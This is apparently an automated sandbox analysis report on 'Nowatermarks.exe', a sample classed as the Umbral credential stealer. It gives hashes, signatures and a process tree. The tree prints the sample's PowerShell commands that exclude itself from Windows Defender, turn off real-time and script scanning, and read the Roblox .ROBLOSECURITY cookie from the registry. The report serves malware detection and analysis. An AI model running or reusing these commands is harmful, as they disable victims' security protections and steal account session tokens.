Overview

overview

10

Static

static

10

Nowatermarks.exe

windows7-x64

10

Nowatermarks.exe

windows10-2004-x64

10

Resubmissions

09-08-2024 17:20

240809-vwc9aataqn 10

09-08-2024 17:16

240809-vtg5fsxblb 10

08-08-2024 19:08

240808-xtpkmsxgmn 10

Analysis

  • max time kernel
    118s
  • max time network
    119s
  • platform
    windows7_x64
  • resource
    win7-20240729-en
  • resource tags

    arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
  • submitted
    08-08-2024 19:08

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Nowatermarks.exe

  • Size

    227KB

  • MD5

    926ac9e42778634f5c2580a913d83f62

  • SHA1

    e36c92f542a4c010c9cbbdb91df84ec2e16ac62f

  • SHA256

    4916686177420dca945e81aebaf2fc098c21ddb74fbbf9d0f6f2adaf37f218e8

  • SHA512

    e415af55a761d060dfd56f77491d853edb806c5e2337460fb7df8ac76f986e7a89904caa913b56fcbf19e0f3e084a71ef1a13336cf7aa73cdd52c342ff8375c6

  • SSDEEP

    6144:+loZMCrIkd8g+EtXHkv/iD475jhDJ6idOIJbGmTLFb8e1mYi:ooZZL+EP875jhDJ6idOIJbGmTJu

Score
10/10
umbralcredential_accessexecutionspywarestealer

Malware Config

Signatures

  • Detect Umbral payload 1 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

    stealerumbral
  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

    credential_accessstealer
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Using powershell.exe command.

    execution
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 27 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Nowatermarks.exe
    "C:\Users\Admin\AppData\Local\Temp\Nowatermarks.exe"
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2328
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nowatermarks.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2876
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2276
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2604
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2352
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" os get Caption
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:552
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" computersystem get totalphysicalmemory
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1420
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      2⤵
        PID:1092
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        PID:444
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic" path win32_VideoController get name
        2⤵
        • Detects videocard installed
        PID:1628

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\N8FGY07ROES8EH7UJEX9.temp
      Filesize

      7KB

      MD5

      84202321f326a025f1de4bfeb3f2b720

      SHA1

      e16947c5065bb8ed26eade71e33d4807b614bd82

      SHA256

      99f166e7350821c67b42a9b0b11a4bd4398d0f01de7bb3bc204f0c8d0db3a03b

      SHA512

      be33f82329b47875483c287fe7ccedffe3cf82f176b26bb3263aba8f2e45c7c73ca49e34642e39d40a33bc266f2e539e0cfc34a065b00ae85dd71f469be80a40

      Download Submit

    • memory/2276-22-0x0000000001D80000-0x0000000001D88000-memory.dmp

      Filesize

      32KB

      Download

    • memory/2276-21-0x000000001B770000-0x000000001BA52000-memory.dmp

      Filesize

      2.9MB

      Download

    • memory/2328-1-0x0000000000CF0000-0x0000000000D30000-memory.dmp

      Filesize

      256KB

      Download

    • memory/2328-2-0x000007FEF4EE0000-0x000007FEF58CC000-memory.dmp

      Filesize

      9.9MB

      Download

    • memory/2328-51-0x000007FEF4EE0000-0x000007FEF58CC000-memory.dmp

      Filesize

      9.9MB

      Download

    • memory/2328-0-0x000007FEF4EE3000-0x000007FEF4EE4000-memory.dmp

      Filesize

      4KB

      Download

    • memory/2876-10-0x000007FEEC3B0000-0x000007FEECD4D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2876-13-0x000007FEEC3B0000-0x000007FEECD4D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2876-14-0x000007FEEC3B0000-0x000007FEECD4D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2876-15-0x000007FEEC3B0000-0x000007FEECD4D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2876-12-0x000007FEEC3B0000-0x000007FEECD4D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2876-11-0x000007FEEC3B0000-0x000007FEECD4D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2876-8-0x000000001B6A0000-0x000000001B982000-memory.dmp

      Filesize

      2.9MB

      Download

    • memory/2876-9-0x0000000002390000-0x0000000002398000-memory.dmp

      Filesize

      32KB

      Download

    • memory/2876-7-0x000007FEEC66E000-0x000007FEEC66F000-memory.dmp

      Filesize

      4KB

      Download